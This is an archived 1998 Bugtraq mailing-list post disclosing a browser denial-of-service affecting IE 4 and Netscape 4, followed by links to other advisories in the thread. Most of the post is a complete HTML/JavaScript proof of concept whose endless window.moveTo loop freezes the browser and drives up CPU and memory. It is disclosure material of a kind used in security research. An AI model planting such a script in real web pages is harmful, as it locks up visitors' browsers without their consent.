Bugtraq mailing list archives
More browser bugs.
From: dan () ACCESS-1 COM (Dan)
Date: Thu, 26 Mar 1998 11:00:17 +0200
Following all the IE bugs postings:
The code below will make any browser "go nuts", however, if you press
escape on netscape 4 (STOP) - it stops - IE 4, however... does not. CPU
goes up, mem usage goes up - etc. Tested with win95, NT+SP3 4.0
workstation, and NT 4.0+SP3 Server.
Minimizing won't work either, on NT the window unminimizes itself, on 95
the minimized task-bar "jumps" around.
One more interesting thing: Explorer lets you position the window out of
the screen's range (in a position thats "out" of the screen) - netscape
doesnt.
(you can also change the minx/miny numbers to a negative values - and it
"works" with IE.)
<!---
<HTML>
email: xyster () writeme com
Have fun . . .
-->
<HEAD>
<TITLE>Bounce</TITLE>
<SCRIPT LANGUAGE="javascript">
var dx, dy, x, y, minx, miny, maxx, maxy;
dx = 50;
dy = 100;
x = Math.random() * 200;
y = Math.random() * 200;
minx = 0;
maxx = 600;
miny = 0;
maxy = 600;
do {
window.moveTo(x, y);
x += dx;
y += dy;
if (x <= minx || x >= maxx) dx = -dx;
if (y <= miny || y >= maxy) dy = -dy;
} while(1);
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
-->
Dan Anatol
FingerPrint: C43B 06CE 67EB 21CD C6BD E308 94AD 363E D0AC A687
Current thread:
- Eudora Pro 4.0 attachment/long filename problem, (continued)
- Eudora Pro 4.0 attachment/long filename problem whiz (Mar 29)
- mysql: MySQL Security Michael Widenius (Mar 29)
- wtmpx utility for solaris Ryan (Mar 30)
- Re: wtmpx utility for solaris Mikael Brandstrom (Mar 31)
- HPSBUX9803-077 Security Vulnerability with inetd on HP-UX Aleph One (Mar 30)
- pset Buffer Overrun Vulnerability SGI Security Coordinator (Mar 26)
- Netscape Navigator Security Vulnerabilities SGI Security Coordinator (Mar 26)
- Re: Trivial mSQL/MySQL DoS method? Nigel Reed (Mar 26)
